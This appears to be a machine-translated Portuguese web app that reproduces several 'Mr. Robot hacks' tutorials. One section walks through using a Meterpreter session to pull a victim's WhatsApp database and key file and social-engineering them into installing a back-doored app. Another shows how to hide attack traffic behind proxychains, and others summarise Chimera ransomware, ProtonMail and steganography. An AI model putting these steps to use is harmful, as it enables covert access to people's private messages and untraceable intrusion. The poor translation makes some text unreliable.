<div class="tarea widget uib_w_333 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_333">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Uma vez no prompt meterpreter, tipo <strong>check_root</strong> para garantir que o dispositivo está enraizada.</p>
</div>
</div>
<div class="widget uib_w_334" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/42/14/63579520486635/0/hack-and-decrypt-whatsapp-database-remotely-root.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_335 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_335">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O que queremos exigir?</p>
<p>Para descriptografar o banco de dados, precisamos que o próprio banco de dados e, obviamente, um arquivo de chave na pasta / data, para o qual precisamos de raiz para acessar o local. Nós <strong>não pode</strong> descriptografar
o banco de dados sem a chave (Até que você quer gastar mais de 100 anos, mesmo com um mainframe!)</p>
<p>Passo 2: Vamos começar o processo de extração de dados:</p>
<p>Em tipo meterpreter:</p>
<p><strong>CD /</strong>
</p>
<p><strong>cd / sdcard / WhatsApp</strong>
</p>
<p><strong>ls</strong> (Imprimir o diretório atual)</p>
</div>
</div>
<div class="widget uib_w_336" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/30/52/63579520516057/0/hack-and-decrypt-whatsapp-database-remotely-root.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_337 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_337">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>cd Databases</strong>
</p>
<p><strong>Download msgstore.db.crypt8</strong> (Isso vai levar tempo, talvez muito)</p>
</div>
</div>
<div class="widget uib_w_338" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/65/23/63579520551463/0/hack-and-decrypt-whatsapp-database-remotely-root.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_339 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_339">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<h2>Passo 3: Cair no Shell:</h2>
<p>Como dito antes, mas acrescentando um pouco <strong>mais detalhes</strong> aqui:</p>
<p>Para descriptografar os <strong>crypt8</strong> arquivos, teremos o arquivo de chave. O arquivo de chave dois conjuntos de <strong>chaves de descriptografia</strong> - a chave de criptografia real, <strong>K</strong> e
um vector de inicialização chamado IV. WhatsApp armazena o arquivo de chave em um <strong>local seguro.</strong>
</p>
<p>Extraindo o <strong>arquivo de </strong>chave, digite:</p>
<p><strong>shell</strong>
</p>
<p><strong>su</strong> (para Super acesso do usuário ou simplesmente escalada de privilégios)</p>
<p>Aqui vem a parte complicada, se o destino for experiente e habilidoso, ele deve ter instalado o <strong>SuperSU</strong> aplicação.</p>
<p>O aplicativo é responsável por manter as permissões se que a aplicação pode ter acesso ao root. Ele ainda detém todos os logs.</p>
<p>Então, nós precisamos convencer a vítima de que o pedido é para aumentar (ou qualquer outro motivo) sua / seu sistema android, mas ao mesmo tempo requer acesso root para alcançar o seu potencial máximo. Aqui é um<strong>excelente tutorial</strong> por Bart que
mostra como disfarçar um aplicativo de back-door.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinta_rorr">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_347" data-uib="layout/header" data-ver="0">
<h2>Os Hacks de Mr. Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_348 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_ful"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_34_59">
<div class="tarea widget uib_w_349 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_349">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Embora o meu programa de TV favorito, <em>Mr. Robot,</em> tinha terminado a sua primeira temporada já, eu não tenha completado demonstrando os hacks que Elliot utilizados no show. (By the way, eu não
posso esperar para a temporada 2!)</p>
<p>Em vários episódios, Elliot foi visto enviando e-mails seguros. Como um hacker experiente e esclarecido, ele nunca iria usar o Gmail, Hotmail, Yahoo ou para enviar mensagens confidenciais. Em vez disso, Elliot escolheu
o sistema de e-mail mais seguro disponível para as pessoas não militares e não-espião como eu e você: ProtonMail.</p>
</div>
</div>
<div class="widget uib_w_350" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/04/31/63578436594210/0/hacks-mr-robot-send-ultra-secure-emails.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_351 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_351">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Em um mundo onde o Google ea NSA inspecionar cada e-mail, um serviço de e-mail realmente seguro seria uma dádiva de Deus. Vários sistemas de e-mail têm elogiado a si mesmos como seguro, mas, finalmente, aprendi que eles
eram falhos ou que seus servidores poderia ser agarrado e inspecionados ou de outra forma comprometida.</p>
<p>Sobre ProtonMail</p>
<p>ProtonMail foi desenvolvido em 2013, pelo menos em parte, devido às revelações que Edward Snowden fornecidas sobre vigilância programa da NSA mundial (WWS). Ele foi desenvolvido por pesquisadores do CERN em Genebra, Suíça. Se
você não estiver familiarizado com o CERN, é o maior centro de pesquisa subatômica do mundo que muitos de crédito com o desenvolvimento da World Wide Web, entre outras coisas.</p>
<p>Sendo baseado na Suíça dá ProtonMail várias vantagens.</p>
<p>Em primeiro lugar, a UE tem padrões de privacidade mais rigorosas do que os EUA, e embora a Suíça não é membro da UE, a Europa tem muito maior respeito pela privacidade individual do que aquilo que é praticado em os EUA, atualmente.</p>
<p>Em segundo lugar, a Suíça tem, provavelmente, os padrões de privacidade mais rigorosas em toda a Europa. Há muito tempo um refúgio para a neutralidade e contas bancárias secretas, Suíça desenvolveu leis sofisticadas para
proteger a privacidade dos indivíduos. Além disso, a Suíça está fora da jurisdição legal dos EUA e da UE. Isto o torna um local físico quase perfeita para um servidor de e-mail privado.</p>
<p>ProtonMail foi projetado para dar ao usuário de e-mail completo anonimato. Para alcançar este anonimato, ele fornece o seguinte.</p>
<p>Criptografia end-to-end (e-mails são decifradas no seu navegador).</p>
<p>Não necessita de um número de telefone ou outro e-mail para abrir uma conta (essa conta pode ser usado para controlar a sua identidade).
<br>Você pode configurar seu e-mail para expirar após um número de dias-até mesmo horas.</p>
<p>Ele mantém há logs.</p>
<p>Mesmo os administradores em ProtonMail não pode ler seu e-mail.
<br>Ele está localizado em uma nação neutra, que é conhecido por seu respeito pela privacidade.</p>
<p>ProtonMail se tornou muito popular por causa destas características de segurança únicas. Atualmente, existem mais de 250.000 usuários em todo o mundo e crescendo rapidamente. Devido a este crescimento rápido, você
pode ter de esperar algum tempo para obter uma conta. Você precisa primeiro pedido uma conta e, quando têm a capacidade, eles vão enviar e-mail de volta dizendo que você é elegível para abrir uma conta. Atualmente,
este leva 2-3 semanas, mas não variar.</p>
<p>Originalmente financiado pelo crowdsourcing, ProtonMail recentementerecebeu capital de risco a se expandir. Podemos apenas esperar que isso vai ajudá-los a acompanhar a demanda para o seu serviço valioso.</p>
<p>Passo 1: solicitar uma conta ProtonMail</p>
<p>O primeiro passo, claro, é pedir para uma conta. Ir para protonmail.ch e enviar uma solicitação para uma conta.</p>
<p>Passo 2: Criar Conta</p>
<p>Assim que receber o e-mail avisando que agora você pode abrir uma conta, clique no link que lhe enviou. Isto irá levá-lo para uma tela "Crie Sua Conta", como abaixo.
<br>
<br>
</p>
<p>Ela se parece muito com qualquer outra forma conta de webmail, com uma exceção: ele exige duas senhas. Um deles é para entrar em sua conta eo outro é para decifrar o seu e-mail. Para segurança máxima, a certeza de
que estes dois são diferentes.</p>
<p>Passo 3: Log-In</p>
<p>Depois de ter criado uma conta, você pode logar como qualquer outra conta de webmail.</p>
</div>
</div>
<div class="widget uib_w_352" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/17/76/63578434600288/0/hacks-mr-robot-send-ultra-secure-emails.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_353 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_353">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Agora que você registrar com seu nome de usuário e senha, ProtonMail irá pedir-lhe para a sua segunda senha que é usada para descriptografar seu e-mail.
<br>Quando você entrar, ele começa a trabalhar em descriptografar seu e-mail como pode ser visto abaixo.</p>
</div>
</div>
<div class="widget uib_w_354" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/98/18/63578434914678/0/hacks-mr-robot-send-ultra-secure-emails.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_355 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_355">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Quando todo o seu e-mail é descriptografado, ele vai abrir uma interface de e-mail familiar.</p>
</div>
</div>
<div class="widget uib_w_356" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/88/44/63578435027631/0/hacks-mr-robot-send-ultra-secure-emails.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinsta_quatro">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_357" data-uib="layout/header" data-ver="0">
<h2>Os Hacks de Mr. Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_358 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="vai_doido"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_82_46">
<div class="tarea widget uib_w_359 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_359">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Na conclusão do <em>Mr. Robot</em> série de televisão, Elliot e fsociety concluído com êxito a sua missão de criptografar todos os dados de Evil Corp com criptografia AES-128 e destruindo a chave.</p>
<p>Agora que todos os dados em servidores de Evil Corp (incluindo 70% da dívida do consumidor e empréstimos estudantis do mundo) foi destruído com sucesso, vamos examinar como eles fizeram isso, ou melhor ... como eles <em>poderiam</em> ter
feito isso. Uma vez que o show é um pouco vago sobre detalhes, vamos examinar um ataque similar que recentemente vieram à tona na Europa.</p>
<h2>Uma rápida revisão de como ele jogaram para fora</h2>
<p>Sabemos que Elliot e fsociety tinham destruído todas as fitas de back-up na posse de aço da montanha quando cortou o sistema de climatização com uma Pi Raspberry, que eles usaram para aumentar a temperatura na
instalação de armazenamento de alta o suficiente para tornar os backups inutilizável.</p>
<p>Com as fitas inutilizáveis, Elliot tinha que, em seguida, destruir os dados em servidores de Evil Corp sem ser rastreado. Como você já sabe, apagando os arquivos nos servidores não irá remover os dados. Elliot
e seus colegas sabiam disso também, então eles decidiram criptografar os dados com AES em vez disso. Deste modo, os dados foram ainda ali, mas mau para indecipherable Corp.</p>
<h2>Usando quimera como um Exemplo</h2>
<p>Recentemente, um novo tipo de ransomware foi encontrado na Alemanha chamado quimera. Ele tem sido usado para atacar as empresas na Alemanha, em vez de os consumidores como muito do ransomware anterior alvo. Desde
que a maioria ransomware funciona de forma semelhante, vamos usá-lo como um modelo de como Elliot e fsociety pode ter "destruído", ou inutilizados, os dados em discos rígidos de Evil Corp.</p>
<p>Nesta análise, vou resumir como Chimera funciona, </p>
</div>
</div>
<div class="widget uib_w_360" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/94/90/63583013217141/0/hacks-mr-robot-elliot-fsociety-destroyed-evil-corps-data.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_361 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_361">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 1: Entregando o Malware</p>
<p>Como grande parte do ransomware que tem aparecido nos últimos anos, Chimera foi entregue por e-mail, provavelmente com um componente de engenharia social para conseguir que alguém clica em um link ou um arquivo. Ele foi
escrito em .NET.</p>
</div>
</div>
<div class="widget uib_w_362" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/68/56/63583286968494/0/hacks-mr-robot-elliot-fsociety-destroyed-evil-corps-data.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_363 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_363">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Nesta primeira etapa, inicialmente Chimera entrega um stub executável, cujo único trabalho é para chamar, decodificar e decodificar a segunda fase da carga útil, para a vítima.</p>
<p>Passo 2: O algoritmo AES</p>
<p>A segunda etapa é a carga criptografada e codificado que contém um método que é claramente um algoritmo de criptografia AES. Elliot e seus colegas teria usado esta ou algo muito semelhante ao criptografar os dados de Evil
Corp. Provável, que teria executado em vários segmentos para acelerar o processo. Considerando o fato de que o Mal Corp provavelmente tem petabytes de dados, criptografia de tudo isso levaria algum tempo.</p>
</div>
</div>
<div class="widget uib_w_364" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/94/94/63583255013228/0/hacks-mr-robot-elliot-fsociety-destroyed-evil-corps-data.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_365 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_365">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 3: Mapeamento de Memória</p>
<p>Na etapa seguinte, em seguida, mapeia Quimera manualmente seus processos de memória. Isto é muito provável que ignorar ASLR e DEPproteções que estão incorporadas no Windows e outros sistemas operacionais. Essas
proteções aleatório onde um processo provavelmente vai estar na memória, tornando-a mais difícil de implementar um buffer overflow como o malware não pode prever a localização do ponteiro. Ao mapear manualmente
o processo de memória, torna-se mais provável que o malware irá funcionar como esperado.</p>
<p>.</p>
</div>
</div>
<div class="widget uib_w_366" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/25/56/63583255101807/0/hacks-mr-robot-elliot-fsociety-destroyed-evil-corps-data.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_367 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_367">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Passo 4: Encontre 32-Bit Processo para o Host</p>
<p>Em seguida, Chimera passa por <em>todos os</em> processo do Windows à procura de um processo de 32 bits que pode hospedar sua carga e, em seguida, abri-lo.</p>
</div>
</div>
<div class="widget uib_w_368" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/60/93/63583255416744/0/hacks-mr-robot-elliot-fsociety-destroyed-evil-corps-data.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="trinata_cinco">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_369" data-uib="layout/header" data-ver="0">
<h2>O Hacks de Mr. Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_370 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="fulbr_"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_24_50">
<div class="tarea widget uib_w_371 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_371">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Bem, a primeira temporada de <em>Mr. Robô</em> que acaba de terminar e Elliot e fsociety levou com sucesso o mal Corp! Eles têm efetivamente destruiu mais de 70% da dívida do consumidor e de estudantes do
mundo! Finalmente livre! Finalmente livre!</p>
</div>
</div>
<div class="widget uib_w_372" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/07/29/63576963146472/0/hacks-mr-robot-elliot-fsociety-made-their-hack-evil-corp-untraceable.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_373 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_373">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Naturalmente, os mercados financeiros globais caiu bem, mas isso é outra história.</p>
<p>Embora houvesse muitos elementos que fizeram o hack bem sucedido, como Darlene desenvolvimento de um zero-day exploit (Eu vou te mostrar como fazer isso em um artigo futuro) que nenhum dos sistemas de detecção de intrusão,
firewalls ou softwares antivírus detectado, Elliot também a certeza de que o hack não poderia ser rastreada até ele, usando proxies.</p>
<p>Logo no início do último episódio, Lenny, o ex-namorado da terapeuta de Elliot, Krista, revela a Cristiano que ele tinha sido cortado por Elliot. Ele ressalta que Elliot é quase impossível de rastrear como ele usa um proxy
da Estónia. Neste tutorial, vou mostrar como Elliot saltou seu ataque fora um estónio (ou outro) proxy para fazer seus hacks indetectável.</p>
<h2>Como proxies Trabalho</h2>
<p>Como você sabe, sempre que você visita (ou cortar) um site ou servidor através da Internet, o seu endereço exclusivo Interpretar Protocol (IP) viaja com você. Seria então muito fácil de rastrear a origem de um ataque simplesmente
rastreamento do endereço IP de origem.</p>
<p>Hackers, embora, muitas vezes usam proxies para esconder ou ocultar o seu endereço IP. Desta forma, eles enviar seu tráfego para um proxy intermediário, que, em seguida, envia o tráfego para o destino, substituindo o endereço
IP de origem com o seu próprio. Desta forma, o tráfego malicioso parece ser provenientes do proxy e não o remetente original.</p>
</div>
</div>
<div class="widget uib_w_374" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/46/07/63576961372956/0/hacks-mr-robot-elliot-fsociety-made-their-hack-evil-corp-untraceable.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_375 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_375">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Antes de começar, gostaria de salientar que existem vários tipos de proxies.Um dos mais populares, proxies anônimos é Tor. Embora Tor é eficaz no anonimato o seu tráfego do Google e outros de monitoramento comercial,
não é eficaz no anonimato o seu tráfego de aplicação da lei, especialmente a NSA.</p>
<p>Como Elliot assinala no episódio piloto, quando ele está explicando para o dono da loja de café que também é um pornógrafo criança: "Quem está no controle dos nós de saída também está no controle do tráfego,
o que me faz o único no controle." Ele é dono do nó de saída, proprietária do tráfego, e, portanto, a identidade dos usuários.
<br>
<br>
</p>
<p>Agora, vamos ver como Elliot e fsociety escondeu a sua identidade em seus hacks!</p>
<h2>Passo 1: Fire Up Kali</h2>
<p>Para começar, o fogo até Kali Linux. Se ainda não tiver Kali, você podebaixá-lo aqui.</p>
<h2>Passo 2: Vá para proxychains</h2>
<p>Em seguida, vamos para proxychains. Tipo:</p>
<p><em><strong>kali> proxychains</strong></em>
</p>
<p>Quando você faz isso, mostra-lhe a sintaxe proxychains simples.Basicamente, depois de configurar proxychains, tudo que você precisa fazer é preceder o comando que você deseja executar com o comando "proxychains" e todo o seu
tráfego de Internet vai passar por seu proxy escolhida. Como veremos mais adiante neste tutorial, se quisermos navegar na Web com o nosso navegador, nós podemos simplesmente começar nosso navegador, precedendo-o com
proxychains, tais como:</p>
<p><em><strong>kali> proxychains iceweasel</strong></em>
</p>
</div>
</div>
<div class="widget uib_w_376" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/08/85/63576961387597/0/hacks-mr-robot-elliot-fsociety-made-their-hack-evil-corp-untraceable.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_377 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_377">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<h2>Passo 3: Pesquise proxies</h2>
<p>A fim de criar proxychains para esconder o nosso endereço IP, vamos precisar selecionar um proxy. Há muitos sites na Internet com listas de proxies gratuitos e pagos. Alguns destes incluem, mas não estão limitados
a:
</p>
<p>Hide My Ass!</p>
<p>SamAir Security</p>
<p>Proxy4Free</p>
<p>Hide.me</p>
<p>Vamos tentar usar Samair Segurança. Quando navegar até lá, podemos ver sua lista de proxies gratuitos.</p>
</div>
</div>
<div class="widget uib_w_378" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/96/66/63576961398518/0/hacks-mr-robot-elliot-fsociety-made-their-hack-evil-corp-untraceable.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_379 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_379">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Perto do final da página, podemos ver que eles ter resolvido os proxies por país. Lembre-se, Elliot estava usando um proxy na Estónia. Esta lista tem um 'proxy' indicado na Estónia.
<br>Ao clicar sobre ele, podemos ver que este proxy na Estónia é um proxy transparente. Isso significa que ele não vai esconder o nosso IP. Isso não vai funcionar!
<br>
<br>Ao clicar sobre ele, podemos ver que este proxy na Estónia é um proxy transparente. Isso significa que ele não vai esconder o nosso IP. Isso não vai funcionar!
<br>
<br>
</p>
<p>Podemos ver que há cinco proxies "high-anônimos" na Rússia nesta lista.Vamos nos um daqueles.</p>
<p>Passo 4: Configurar proxychains</p>
<p>Agora que temos uma lista de potenciais proxies anônimos, temos que configurar proxychains para usá-lo. Como quase todas as aplicações Linux / Unix, a configuração é feita por um arquivo de texto simples. Esses arquivos
são geralmente encontrados no <em>/ etc</em> diretório. Neste caso, o arquivo de configuração para proxychains é encontrado em:</p>
<p><em><strong>/etc/proxychains.conf</strong></em>
</p>
<p>Podemos abri-lo com qualquer editor de texto, mas vou usar Leafpad aqui.</p>
<p><em><strong>kali> leafpad /etc/proxychains.conf</strong></em>
<br>
<br>
</p>
<p>Agora, para usar um dos nossos procuradores russos, nós simplesmente precisamos adicionar o tipo de proxy (http) eo endereço IP ea porta para esse proxy como o tenho feito acima. Em seguida, salve o <em>proxychain.conf</em>arquivo
e fechá-lo.</p>
<p>Passo 5: Envie tráfego através de Proxy</p>
<p>Por último, se queremos enviar nosso tráfego HTTP enquanto navega na Web por meio de procuração que Russa, nós simplesmente abrir nosso browser Iceweasel digitando:</p>
<p><em><strong>kali> proxychains iceweasel</strong></em>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="te_ceis">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_380" data-uib="layout/header" data-ver="0">
<h2>O Hacks de Mr. Robot</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_381 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="bt_jh"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_86_78">
<div class="widget uib_w_382" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://img.wonderhowto.com/img/90/24/63576360030455/0/hacks-mr-robot-hide-data-audio-files.w654.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_383 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_383">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Muitos se perguntam por que ele estaria fazendo isso e como o cofre que seria isso?</p>
<p>A resposta é que Eliot está escondendo os dados sobre esses CDs. Ele é realmente copiar músicas para os CDs, em seguida, a incorporação de informações criptografadas sobre eles que só ele pode se recuperar. Então,
quem encontra-los vai ver e ouvir apenas o áudio e não será capaz de encontrar ou recuperar as informações ocultas. Desta forma, os dados de Elliot sobre seus amigos e conhecidos é seguro dos olhos curiosos da aplicação
da lei, ou para essa matéria, qualquer outra pessoa.
<br>
<br>
</p>
<p>O Elliot está fazendo é conhecida como esteganografia, a prática de esconder informações dentro de outro meio digital (áudio, vídeo ou arquivos gráficos).</p>
<p>Por exemplo, se eu quisesse enviar a alguém uma mensagem secreta, eu poderia colocar a mensagem dentro de uma imagem, áudio ou arquivo de vídeo e enviá-lo via e-mail ou permitir-lhes para baixar o arquivo do meu site. Com
a chave adequada e algoritmo, eles e só eles podiam ler-a mensagem secreta. Toda a gente só vê a imagem inócuo ou ouvir o arquivo de áudio.</p>
<p>Espionagem e organizações terroristas têm vindo a utilizar estas técnicas durante muitos anos (supostamente, a Al Qaeda usaram estas técnicas para ocultar mensagens em seu site para os seus seguidores nos anos 1990 e 2000).</p>
<p>Nestes episódios de <em>Mr. Robô,</em> Elliot parece estar a utilizar um pacote de software chamado "DeepSound" para que esconde informação dentro seus ficheiros de áudio, mas existem numerosos pacotes
de software para steganography disponíveis, incluindo, mas não se limitando a:</p>
<ul>
<li>QuickStego</li>
<li>AudioStegano</li>
<li>BitCrypt</li>
<li>MP3Stego</li>
<li>Steghide</li>
<li>AudioStego</li>
</ul>
<p>Embora, em geral, os hackers usam Linux para cortar para muitas boasrazões, DeepSound foi desenvolvido para Windows. Neste caso, vamos usá-lo em um sistema Windows 7, mas ele pode ser usado em praticamente qualquer
sistema operacional Windows.</p>
<p>Etapa 1: Baixar e instalar o programa chamado " Install Deep Sound " procure por ele e instale ele
<br>download dele:
<br>http://jpinsoft.net/DeepSound/Download.aspx
</p>
<p>Para começar, precisamos navegar para o website DeepSound e baixar o software.
<br>
<br>
</p>
<p>Vá em frente e fazer o download e instalá-lo em seu sistema. Seu software AV podem se recusar, identificando-o como um vírus, mas vá em frente e permitir a sua instalação.</p>
<h2>Passo 2: Deep Som interface</h2>
<p>Depois de ter concluído a instalação, você deve ser recebido por uma tela como a mostrada abaixo. Observe que no lado esquerdo da tela, ele está exibindo a estrutura de diretórios do meu drive C:. Ao clicar na seta
para baixo ao lado do drive C: acima da minha estrutura de diretórios, posso navegar para outras unidades ou dispositivos USB no meu sistema.
<br>
<br>
</p>
<p>Os arquivos para a esquerda serão meus "veículo" arquivos de áudio. Em outras palavras, estes são os arquivos que irei utilizar para ocultar meus dados in.</p>
<h2>Passo 3: Configurações</h2>
<p>Se eu clicar no ícone Configurações na barra superior, ele irá abrir uma janela como essa abaixo. Devo definir meu idioma padrão (a única outra escolha para além do Inglês é Eslovaca), o meu diretório de saída, e meu formato
de saída. Este pacote de software só funciona com arquivos .flac ou .wav. Isso significa que você não pode usar arquivos .mp3. Isto é, presumivelmente, porque .mp3s são comprimidas e os outros dois formatos
não são.
<br>
<br>
</p>
<p>Além disso, certifique-se de clicar na caixa de seleção "Criptografar arquivos". Isto irá assegurar que seus arquivos ocultos são criptografados com criptografia AES de 256-bit, entre os algoritmos de criptografia
mais fortes disponíveis. Finalmente, adicione uma senha que será usada para bloquear e, em seguida, desbloquear o criptografia quando você ou o destino desses arquivos quer recuperá-los. Quanto mais tempo
esta palavra-passe, mais forte é a criptografia.</p>
<h2>Passo 4: Selecione os arquivos de áudio</h2>
<p>Em seguida, precisamos selecionar os arquivos de áudio para esconder os dados. Como a maior parte da minha música, provavelmente, como o seu, é em formato .mp3, aqueles que não vai funcionar. Repare que eu tenho algum
Nora Jones em formato .flac que eu vou usar aqui. (Geralmente, os audiófilos preferem .flac como a sua qualidade é superior, mas o tamanho é muito maior, pois é descompactado. É por isso que os dispositivos de áudio
mais móveis usam .mp3, são arquivos muito menores.)</p>
<p>Eu clicar duas vezes no arquivo de áudio e prepara-lo para uso de esconder meus arquivos em.
<br>
<br>Em seguida, clique no ícone "Adicionar arquivos" na barra superior. Isto irá pedir-lhe para adicionar os arquivos que você deseja esconder dentro do arquivo de áudio. Aqui, eu tenho um arquivo chamado <em>Shayla.doc</em> que
eu quero esconder dentro do arquivo de áudio Nora Jones.
<br>Passo 5: Codificar</p>
<p>Quando clico em <em>Shayla.doc, ele adiciona-lo para a janela da direita. </em>Agora, eu preciso clicar no ícone "Encode" na barra superior do ícone.
<br>
</p>
<p>Meu <em>Shayla.doc</em> arquivo agora está encriptada e escondida com meu arquivo de áudio! Não só com esse arquivo de parecer e soar como um arquivo de áudio normal, mas se alguém quiser a informação escondido
